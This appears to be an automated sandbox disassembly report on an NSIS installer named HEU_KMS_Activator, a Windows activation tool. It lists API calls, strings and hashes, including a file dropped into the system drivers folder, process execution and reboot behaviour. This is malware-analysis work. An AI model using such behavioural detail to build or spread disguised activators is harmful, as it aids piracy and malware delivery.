    • GetCommandLineA.KERNEL32(004447E0,NSIS Error), ref: 004037F1
    • GetModuleHandleA.KERNEL32(00000000,00471000,00000000), ref: 00403804
    • CharNextA.USER32(00000000,00471000,00000020), ref: 0040382F
    • GetTempPathA.KERNELBASE(00002000,0047B000,00000000,00000020), ref: 004038C2
    • GetWindowsDirectoryA.KERNEL32(0047B000,00001FFB), ref: 004038D7
    • lstrcatA.KERNEL32(0047B000,\Temp), ref: 004038E3
    • DeleteFileA.KERNELBASE(00479000), ref: 004038FA
    • OleUninitialize.OLE32(00000000), ref: 0040397F
    • ExitProcess.KERNEL32 ref: 0040399F
    • lstrcatA.KERNEL32(0047B000,~nsu.tmp,00471000,00000000,00000000), ref: 004039AB
    • lstrcmpiA.KERNEL32(0047B000,00477000), ref: 004039B7
    • CreateDirectoryA.KERNEL32(0047B000,00000000), ref: 004039C3
    • SetCurrentDirectoryA.KERNEL32(0047B000), ref: 004039CA
    • DeleteFileA.KERNEL32(004289B0,004289B0,?,00449000,?), ref: 00403A14
    • CopyFileA.KERNEL32(0047F000,004289B0,00000001), ref: 00403A28
    • CloseHandle.KERNEL32(00000000,004289B0,004289B0,?,004289B0,00000000), ref: 00403A55
    • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403AAA
    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403AE6
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
    • String ID: /D=$ _?=$"$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
    • API String ID: 2435955865-1845187605
    • Opcode ID: 72c36124f39d23ba37981cfcbd8f5fa2747e063fe3c7f6cacadaf7bad4d5c190
    • Instruction ID: 3adc440307e79391630eee929f1289c887b556818b35536ee5ba50467d4057e6
    • Opcode Fuzzy Hash: 72c36124f39d23ba37981cfcbd8f5fa2747e063fe3c7f6cacadaf7bad4d5c190
    • Instruction Fuzzy Hash: A091C171504745AEEB20AF619D49B6B7EDCEB0130AF04443FF585B62D2CBBC89048B6E

    Control-flow Graph

    APIs
    • DeleteFileA.KERNELBASE(?,?,00471000), ref: 004064F8
    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,\*.*,C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?,771B2EE0,00000000,?,00471000), ref: 00406549
    • lstrcatA.KERNEL32(?,00408514,?,C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?,771B2EE0,00000000,?,00471000), ref: 00406567
    • lstrlenA.KERNEL32(?), ref: 0040656A
    • FindFirstFileA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*,?), ref: 0040657C
    • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 00406657
    • FindClose.KERNEL32(?), ref: 00406668
    Strings
    Similarity
    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
    • String ID: C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*$Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
    • API String ID: 2035342205-2047140648
    • Opcode ID: 15c305e6868780fdf694a6f0b30c5a8d77025f459baacba135a8478b50c90af7
    • Instruction ID: 64147f4c1934b9b7c6948779cb5a6ae0941b2c180e19ba5bea4d6237524946b1
    • Opcode Fuzzy Hash: 15c305e6868780fdf694a6f0b30c5a8d77025f459baacba135a8478b50c90af7
    • Instruction Fuzzy Hash: 37510230404244BADB226B269D46BBF3AA8CF42728F21453FF852711D2CF7D49929A6D

    Control-flow Graph

    APIs
    • GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
    • GetSystemDirectoryA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,00002000), ref: 0040621E
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,00002000), ref: 00406231
    • lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • lstrlenA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004062FD
    Strings
    Similarity
    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
    • API String ID: 3581403547-3783127710
    • Opcode ID: b1b5b2471fa4a599259944452ce01ec4de12a949174302d799c7d87f8d264ba5
    • Instruction ID: 93734740be9412e9caa36ccbcef2caf5c2718b8fcb6d11ef7ae3655d17728ea0
    • Opcode Fuzzy Hash: b1b5b2471fa4a599259944452ce01ec4de12a949174302d799c7d87f8d264ba5
    • Instruction Fuzzy Hash: D4616530900205ABEB206F648C847BF7BA4EB46314F2681BFE953BA2D1C73C4861DB5D

    Control-flow Graph

    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6580b9f868d9dc6f85703e5510bdfa5e1ccb5fc973fafef01c1a6bb868ede633
    • Instruction ID: 99eaa19be747a28839d4db1251bc3981832b3ce45daee931c1dcaa17b470fdec
    • Opcode Fuzzy Hash: 6580b9f868d9dc6f85703e5510bdfa5e1ccb5fc973fafef01c1a6bb868ede633
    • Instruction Fuzzy Hash: 3EF16571904259DBDF18CF28C8946E93BB1FF44345F15812AFC9AAB281D338E995CF85
    APIs
    • GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
    • LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
    • GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    Similarity
    • API ID: AddressHandleLibraryLoadModuleProc
    • String ID:
    • API String ID: 310444273-0
    • Opcode ID: def50b9e3654e381cb613b6edab2f42d350a82c785f1b8382793f1969df32e1c
    • Instruction ID: aca885f6507345e3ecdc89774a22647c421b20d3aef76600dda3df63f8cb038a
    • Opcode Fuzzy Hash: def50b9e3654e381cb613b6edab2f42d350a82c785f1b8382793f1969df32e1c
    • Instruction Fuzzy Hash: 66E0C2326046169BCA000F319E0896B7768EFA9741305483EF545F3150CB38A8228FB9
    APIs
    • FindFirstFileA.KERNELBASE(?,0043D238,0043AA38,0040605F,0043AA38), ref: 00405F3A
    • FindClose.KERNELBASE(00000000), ref: 00405F46
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: 8dd8536ca96e7a9bb2d48d313d3bae79af9a5c131b18c7ae9ad25969cd044193
    • Instruction ID: 47b19902f346a8a8984bb97a0dfd505380ec54685fe9ae0f167d9c0e98e53194
    • Opcode Fuzzy Hash: 8dd8536ca96e7a9bb2d48d313d3bae79af9a5c131b18c7ae9ad25969cd044193
    • Instruction Fuzzy Hash: 93D012355095205BC34067386D0C84B7B58DF19331B104B36F66DF61E0CB388C528A9D

    Control-flow Graph
    APIs
    • PostQuitMessage.USER32(00000000), ref: 00401633
    • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0040169E
    • SetForegroundWindow.USER32(?), ref: 004016B7
    • ShowWindow.USER32(?), ref: 00401744
    • ShowWindow.USER32(?,00000001), ref: 00401758
    • SetFileAttributesA.KERNEL32(00000000,?), ref: 0040177E
    • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 004017DD
    • GetLastError.KERNEL32(?,00000000,0000005C,00000000), ref: 004017E7
    • GetLastError.KERNEL32(?,00000000,0000005C,00000000), ref: 004017F4
    • SetCurrentDirectoryA.KERNELBASE(00000000,00475000,00000000,000000E6,00000000), ref: 00401858
    • MoveFileA.KERNEL32(00000000,?), ref: 004018E4
    • GetFullPathNameA.KERNEL32(00000000,00002000,?,?,000000E3,?,?,00000000), ref: 0040194B
    • GetShortPathNameA.KERNEL32(?,?,00002000), ref: 00401991
    • SearchPathA.KERNEL32(00000000,00000000,00000000,00002000,?,?,?,?,00000000), ref: 004019B1
    Strings
    • CreateDirectory: "%s" (%d), xrefs: 004017B1
    • Jump: %d, xrefs: 004015EC
    • detailprint: %s, xrefs: 00401665
    • CreateDirectory: can't create "%s" (err=%d), xrefs: 004017FC
    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 0040181A
    • Sleep(%d), xrefs: 00401689
    • SetFileAttributes failed., xrefs: 00401793
    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 0040189F
    • Aborting: "%s", xrefs: 00401608
    • CreateDirectory: "%s" created, xrefs: 0040182A
    • SetFileAttributes: "%s":%08X, xrefs: 0040176D
    • Rename on reboot: %s, xrefs: 00401915
    • IfFileExists: file "%s" exists, jumping %d, xrefs: 00401886
    • Rename: %s, xrefs: 004018D4
    • Rename failed: %s, xrefs: 0040191D
    • Call: %d, xrefs: 00401645
    • BringToFront, xrefs: 004016A9
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: PathWindow$DirectoryErrorFileLastNameShow$AttributesCreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
    • API String ID: 1049312888-3619442763
    • Opcode ID: 92d6c438a4e92df1c16294230002a52b75c6c0211279c0c80293cf5291ef5e81
    • Instruction ID: 43567aab8204be1f6f8a6f214d53e59326f3baeabd2f2d3e9f428d24070b1dcb
    • Opcode Fuzzy Hash: 92d6c438a4e92df1c16294230002a52b75c6c0211279c0c80293cf5291ef5e81
    • Instruction Fuzzy Hash: E4B10132904114AFDB107BA59D499AF3BB8EF45364B24013FF851B32E2DE7C4941ABAD

    Control-flow Graph
    APIs
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • lstrcatA.KERNEL32(00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006,00471000,00000000,0047B000,00000000), ref: 00405722
    • lstrlenA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,?,?,?,C:\Windows\SysNative\drivers\DvLayout.exe,00000000,00473000,00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006,00471000), ref: 00405797
    • lstrcmpiA.KERNEL32(?,.exe), ref: 004057AA
    • GetFileAttributesA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe), ref: 004057B5
    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00473000), ref: 0040581E
      • Part of subcall function 00405C1F: wsprintfA.USER32 ref: 00405C2C
    • RegisterClassA.USER32 ref: 00405865
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040587D
    • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004058B6
    • ShowWindow.USER32(00000005,00000000), ref: 004058EC
    • LoadLibraryA.KERNEL32(RichEd20), ref: 004058FD
    • LoadLibraryA.KERNEL32(RichEd32), ref: 00405908
    • GetClassInfoA.USER32(00000000,RichEdit20A,00444780), ref: 00405918
    • GetClassInfoA.USER32(00000000,RichEdit,00444780), ref: 00405925
    • RegisterClassA.USER32(00444780), ref: 0040592E
    • DialogBoxParamA.USER32(?,00000000,00405203,00000000), ref: 0040594D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
    • String ID: .DEFAULT\Control Panel\International$.exe$C:\Windows\SysNative\drivers\DvLayout.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
    • API String ID: 914957316-3174253577
    • Opcode ID: 740a21c8eb156348ea30bb121eb7f6539eb9b3385ce34993b4d1fb3ae82879e5
    • Instruction ID: 23a913ed313d04aaa964b1e3adb5b6dbdec39892ae29868ca26d260f2d2d0806
    • Opcode Fuzzy Hash: 740a21c8eb156348ea30bb121eb7f6539eb9b3385ce34993b4d1fb3ae82879e5
    • Instruction Fuzzy Hash: 3371A2B1540704AFE710AB659D85F2B3AACEB81709F10043FF945B61E2DB7C98419F2D

    Control-flow Graph

    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • lstrcatA.KERNEL32(00000000,00000000,C:\Windows\SysNative\drivers\DvLayout.exe,00475000,00000000,00000000), ref: 00401A48
    • CompareFileTime.KERNEL32(-00000014,00475000,C:\Windows\SysNative\drivers\DvLayout.exe,C:\Windows\SysNative\drivers\DvLayout.exe,00000000,00000000,C:\Windows\SysNative\drivers\DvLayout.exe,00475000,00000000,00000000), ref: 00401A72
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
    • API String ID: 4286501637-800567599
    • Opcode ID: e56eb7d7c5b6bc145d20ff5dbc898ad347418731b7a4ed0a286d93d2c57b5021
    • Instruction ID: 0dbac18d5163ab2b0bf6f932dd3efdd3c4ff5a4e9782b1b471820d854f15f35f
    • Opcode Fuzzy Hash: e56eb7d7c5b6bc145d20ff5dbc898ad347418731b7a4ed0a286d93d2c57b5021
    • Instruction Fuzzy Hash: 4551D471904614BADB107B66DC46EAF3978DF01328B20063FF411B11E2DE7D9A41AFAD

    Control-flow Graph
    APIs
    • GetTickCount.KERNEL32 ref: 00403486
    • GetModuleFileNameA.KERNEL32(00000000,0047F000,00002000), ref: 004034A2
      • Part of subcall function 00405B31: GetFileAttributesA.KERNELBASE(00000003,004034B5,0047F000,80000000,00000003), ref: 00405B35
      • Part of subcall function 00405B31: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B57
    • GetFileSize.KERNEL32(00000000,00000000,00481000,00000000,00477000,00477000,0047F000,0047F000,80000000,00000003), ref: 004034EB
    Strings
    • Error launching installer, xrefs: 004034C2
    • Yanu, xrefs: 00403557
    • Null, xrefs: 00403569
    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://www.ccav1.com, xrefs: 00403682
    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403670
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: File$AttributesCountCreateModuleNameSizeTick
    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://www.ccav1.com$Null$Yanu
    • API String ID: 4283519449-1510984517
    • Opcode ID: 083bb14234767c6b42ee5d60f754b75cb8c714dea4db48c5c12bf051bcf1056b
    • Instruction ID: 70366765bf2586d88c102f1ea9b365f831f717f8dfbc2e26b05df611eadc8c43
    • Opcode Fuzzy Hash: 083bb14234767c6b42ee5d60f754b75cb8c714dea4db48c5c12bf051bcf1056b
    • Instruction Fuzzy Hash: 1F71D671A11208ABDB20AFA5DD85B9E7EACEB04719F10453FF504B72D1EB389E448B5C

    Control-flow Graph
    APIs
    • GetModuleHandleA.KERNELBASE(00000000), ref: 004023AD
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • LoadLibraryExA.KERNELBASE(00000000,?,00000008), ref: 004023BE
    • GetProcAddress.KERNEL32(?,?), ref: 004023D5
    • FreeLibrary.KERNEL32(?,?), ref: 00402455
    Strings
    • Error registering DLL: Could not initialize OLE, xrefs: 00402479
    • Error registering DLL: %s not found in %s, xrefs: 0040242C
    • Error registering DLL: Could not load %s, xrefs: 00402468
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$Library$AddressFreeHandleLoadModuleProcTextWindowlstrcatwvsprintf
    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
    • API String ID: 3271377537-945480824
    • Opcode ID: ed6fcfdba7cafe0a94d3365c6ccbd1bb076e04d6fd5e81889b96f6e70d872a55
    • Instruction ID: 1385288b8d20bff87df3c13422bfb71b17e426659149a7e30c8991742041c895
    • Opcode Fuzzy Hash: ed6fcfdba7cafe0a94d3365c6ccbd1bb076e04d6fd5e81889b96f6e70d872a55
    • Instruction Fuzzy Hash: 8421A331900119FBCF106FA5CE49A9E7A74AF40358F60813BF911B11E1DBBC4981AAAD

    Control-flow Graph
    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
      • Part of subcall function 0040599A: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0043A9F0,Error launching installer), ref: 004059BF
      • Part of subcall function 0040599A: CloseHandle.KERNEL32(?), ref: 004059CC
    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402260
    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00402275
    • GetExitCodeProcess.KERNELBASE(?,?), ref: 00402282
    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402A88
    Strings
    • Exec: command="%s", xrefs: 00402222
    • Exec: success ("%s"), xrefs: 00402244
    • Exec: failed createprocess ("%s"), xrefs: 004022AE
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp
